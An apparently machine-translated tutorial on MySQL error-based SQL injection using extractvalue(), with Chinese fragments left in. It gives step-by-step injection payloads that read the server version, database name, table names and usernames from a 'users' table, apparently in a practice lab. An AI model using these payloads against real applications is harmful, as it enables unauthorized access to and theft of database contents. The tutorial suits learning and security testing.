What is mysql error injection?

In mysql, error injection refers to constructing appropriate statements to obtain the desired data through the error information reported on the page; if the application system does not close the database error function, you can use the extractvalue() function to obtain the desired data from the target Returns a string containing the queried value in XML.

The operating environment of this tutorial: windows10 system, mysql8.0.22 version, Dell G3 computer.

What is mysql error injection?

1. What is error injection? And under what circumstances is it used?

Error injection can also be said to be a kind of blind injection------construct the payload so that the information is echoed through the error prompt. You can consider using error injection when joint query cannot reveal the obvious position.

So how is error injection formed?

First of all, the application system has not closed the database error reporting function. For some SQL statement errors, it is directly echoed on the page, and some even directly leak the database name and table name;

Secondly , it is essential that the corresponding error reporting function of MySQL is not filtered in the background.

2. Commonly used functions for error reporting

Here I use the extractvalue() function, whose function is to extract the value from the target Returns a string containing the queried value in XML

EXTRACTVALUE (XML_document, XPath_string): The first parameter: XML_document is in String format, which is the name of the XML document object; The second parameter: String)

3. Basic process

1. Obtain version information

Use the statement 1' and extractvalue(1,concat(0x7e,(select @@version), 0x7e))-- . Among them, concat is the parameter in concatenation (), and 0x7e is the ~ symbol after decoding. -- is the comment character, comment out all subsequent statements in the source code to avoid errors. The results after the test are as follows:

​​ ​ //The 1 before concat is the first parameter of the extractvalue() function, which can be replaced by any number

​ ​ ​ ​ // The second 0x7e in the statement can be omitted

2. Get the database name

Use the statement

 1‘ and extractvalue(1,concat(0x7e,(select database()),0x7e))--+，

3. Get the table name

　　　　　1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+. 其中group_concat将tale_name字段的所有行放在一行上显示出来，如下所示

4. Get the data

　　　　1' and extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) as a),0x7e))--+. 修改其中的limit参数即可获取users表中的不同行内容

Recommended Learning: mysql video tutorial

The above is the detailed content of What is mysql error injection?. For more information, please follow other related articles on the PHP Chinese website!